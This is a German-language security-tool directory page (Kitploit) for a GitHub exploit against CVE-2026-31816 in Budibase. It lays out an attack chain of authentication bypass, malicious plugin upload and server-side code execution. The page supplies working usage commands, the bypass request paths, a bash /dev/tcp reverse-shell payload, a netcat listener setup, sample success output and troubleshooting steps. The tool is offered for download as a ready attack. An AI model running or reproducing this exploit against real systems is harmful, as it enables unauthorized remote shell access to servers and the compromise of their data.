Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-31816-rshell — Nutzt CVE-2026-31816 in Budibase aus, um die Authentifizierung zu umgehen, ein bösartiges Datenquellen-Plugin hochzuladen und eine Reverse Shell für den Fernzugriff auszuführen. | Kitploit
Tools/GitHubGitHub/imjdl/cve-2026-31816-rshell
ExploitationWebanwendungs-ExploitationAuthentifizierungRemote-Access-ToolPayload-Entwicklung
GitHubimjdl/cve-2026-31816-rshell

CVE-2026-31816-rshell

Nutzt CVE-2026-31816 in Budibase aus, um die Authentifizierung zu umgehen, ein bösartiges Datenquellen-Plugin hochzuladen und eine Reverse Shell für den Fernzugriff auszuführen.

Repository anzeigen
7vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-31816 Reverse-Shell-Exploit

Übersicht

Dieses Tool nutzt CVE-2026-31816 aus, um eine Reverse-Shell-Verbindung auf einem Ziel-Budibase-Server herzustellen.

Angriffskette: Authentifizierungsumgehung → Upload des DATASOURCE-Plugins → serverseitige Codeausführung → Reverse Shell

Voraussetzungen

  • Python 3.6+
  • requests-Bibliothek (pip install requests)
  • Ziel-Budibase-Server, der für CVE-2026-31816 anfällig ist

Verwendung

Grundlegende Schritte

root@kitploit:~
# 1. Listener auf dem Angreifer-Rechner starten
nc -lvnp 4444

# 2. Exploit ausführen (anderes Terminal)
python3 CVE-2026-31816-rshell.py -t http://target:10000 --lhost YOUR_IP --lport 4444

Parameter

ParameterErforderlichBeschreibung
-t, --target✅Ziel-Budibase-URL
--lhost✅Listener-Host (deine IP)
--lport❌Listener-Port (Standard: 4444)

Beispiele

root@kitploit:~
# Angreifer-IP: 192.168.1.100
# Ziel-Budibase: 192.168.1.128:10000

# Terminal 1 - Listener starten
nc -lvnp 4444

# Terminal 2 - Exploit ausführen
python3 CVE-2026-31816-rshell.py \
    -t http://192.168.1.128:10000 \
    --lhost 192.168.1.100 \
    --lport 4444

Funktionsweise

1. Schwachstellenprüfung

root@kitploit:~
GET /api/integrations?/webhooks/trigger

Wenn 200 zurückgegeben wird, ist das Ziel für die Authentifizierungsumgehung anfällig.

2. Bösartiges Plugin erstellen

root@kitploit:~
{
  "type": "datasource",
  "schema": { ... }
}

Plugins vom Typ DATASOURCE führen JavaScript-Code auf dem Server aus.

3. Reverse-Shell-Payload

root@kitploit:~
// Wird ausgeführt, wenn das Plugin validiert wird:
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'

4. Hochladen und Ausführen

root@kitploit:~
POST /api/plugin/upload?/webhooks/trigger

Plugin unter Umgehung der Authentifizierung hochladen. Der Code wird während der Validierung ausgeführt.

Angriffsablauf

root@kitploit:~
┌─────────────┐     ┌─────────────┐     ┌─────────────┐
│  Angreifer  │     │   Ziel-     │     │  Listener   │
│             │     │   Server    │     │   (nc)      │
│             │     │             │     │             │
│ exploit ────┼────►│ Upload      │     │             │
│             │     │ Plugin      │     │             │
│             │     │ Execute     │────►│ Listen      │
│             │     │ Code        │◄────┤ Reverse     │
│             │     │             │     │ Connect     │
└─────────────┘     └─────────────┘     └─────────────┘

Erfolgsindikator

root@kitploit:~
============================================================
CVE-2026-31816 - Reverse Shell Exploit
============================================================
[*] Ziel: http://192.168.1.128:10000
[*] Reverse Shell: 192.168.1.100:4444

[*] Prüfe Schwachstelle...
[+] Ziel ist anfällig!
[*] Erstelle Reverse-Shell-Plugin für 192.168.1.100:4444

[*] Lade Reverse-Shell-Plugin hoch...
[*] Status: 200
[+] Plugin erfolgreich installiert!

============================================================
[+] ERFOLG! Prüfe deinen Listener!
============================================================

Fehlerbehebung

F: Verbindung fehlgeschlagen, keine Shell empfangen

Mögliche Ursachen:

  1. Firewall blockiert die Reverse-Verbindung
  2. Zielserver kann die Angreifer-IP nicht erreichen
  3. Zielserver verfügt nicht über bash

Lösungen:

root@kitploit:~
# Netzwerkverbindung prüfen
ping YOUR_IP

# Firewall prüfen
sudo ufw allow 4444/tcp

# Anderen Port versuchen
nc -lvnp 8080

F: Upload fehlgeschlagen

Mögliche Ursachen:

  1. Ziel hat die Schwachstelle gepatcht
  2. Netzwerkprobleme

Lösungen:

root@kitploit:~
# Manuell testen, ob die Schwachstelle existiert
curl -s "http://target:10000/api/integrations?/webhooks/trigger"
# Wenn JSON zurückgegeben wird, existiert die Schwachstelle
Tool herunterladen